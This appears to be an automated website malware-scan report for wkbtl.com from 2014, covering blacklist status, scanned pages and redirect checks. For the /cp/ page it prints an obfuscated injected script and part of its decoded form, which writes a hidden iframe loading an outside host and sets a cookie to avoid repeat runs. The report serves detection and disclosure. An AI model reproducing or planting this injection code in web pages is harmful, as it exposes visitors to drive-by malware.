Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wkbtl.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wkbtl.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wkbtl.com/ | 200 OK Content-Length: 466 Content-Type: text/html | clean |
http://wkbtl.com/.ftpquota | 403 Forbidden Content-Length: 440 Content-Type: text/html | clean |
http://wkbtl.com/test404page.js | 404 Not Found Content-Length: 441 Content-Type: text/html | clean |
http://wkbtl.com/cgi-bin/ | 403 Forbidden Content-Length: 439 Content-Type: text/html | clean |
http://wkbtl.com/cp/ | 200 OK Content-Length: 17272 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. for(tabArc=0;tabArc<4;tabArc++){tabArc++};var gzOutS;for(loopS=0;loopS<2;loopS++){};gzOutS='%4e%4e%4e%45%44%48%4b%4d%02%56%59%4e%45%4c%03%12%77%4a%02%61%4f%54%13%1f%41%57%68%65%4c%70%6a%5a%00%07%17%1b%40%47%17%6a%70%0e%73%5e%45%0e%11%01%05%6b%5e%1d%56%52%42%50%74%68%04%13%11%1b%1b%23%4f%4e%66%56%4b%60%07%47%10%49%35%0c%0f%24%0b%6d%0c%19%09%1a%16%43%26%33%1b%7d%15%0e%00%1e%1a%3e%1c%31%4b%6f%16%43%6e%11%2c%55%53%55%72%4e%59%3b%5f%58%45%6d%5c%6b ...[3590 bytes skipped]... Decoded script: ...[137 bytes skipped]... document.cookie.indexOf(this.doCont+'='+this.cowQD)==-1);},ccContPut:function(name, value){var d=new Date();d.setTime(new Date().getTime()+1800000); document.cookie=name+"="+escape(value)+";expires="+d.toGMTString(); },useUse:function(){return 'http://62foots.info/t/';},metaMid:function(){var jMax=document;if((new String(jMax.write)).indexOf('arity')>0) {return;}if(!this.opPut()) {try {outCp = "<div style='display:none'>";outCp+="<iframe ";outCp+="frameborder=0 ";outCp+="src='"+this.useUse();outCp+="'></iframe>";outCp+="</div>";jMax.open();jMax.write(outCp);jMax.close();outCp = null;} catch(e) {jMax.write("<html><body></body></html>");var vipRm=this;setTimeout(function(){ vipRm.metaMid() },1000);}this.ccContPut(this.doCont,this.cowQD);}}};this.aNatLs="aNatLs";var wilCc=new byteK(); var dGAs='';wilCc.metaMid();var beP=new Date(); function byteK(){};this.logAskEx='';byteK.proto ...[1171 bytes skipped]... | ||
http://wkbtl.com/cp/scripts/index.html | 200 OK Content-Length: 497 Content-Type: text/html | clean |
http://wkbtl.com/namibia/ | 401 Unauthorized Content-Length: 50 Content-Type: text/html | clean |
http://wkbtl.com/prueba/ | 500 Internal Server Error Content-Length: 770 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wkbtl.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:40:43 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Length: 466
Content-Type: text/html;charset=ISO-8859-1
...466 bytes of data.
GET / HTTP/1.1
Host: wkbtl.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:40:43 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Length: 466
Content-Type: text/html;charset=ISO-8859-1
...466 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wkbtl.com
Referer: http://www.google.com/search?q=wkbtl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wkbtl.com
Referer: http://www.google.com/search?q=wkbtl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.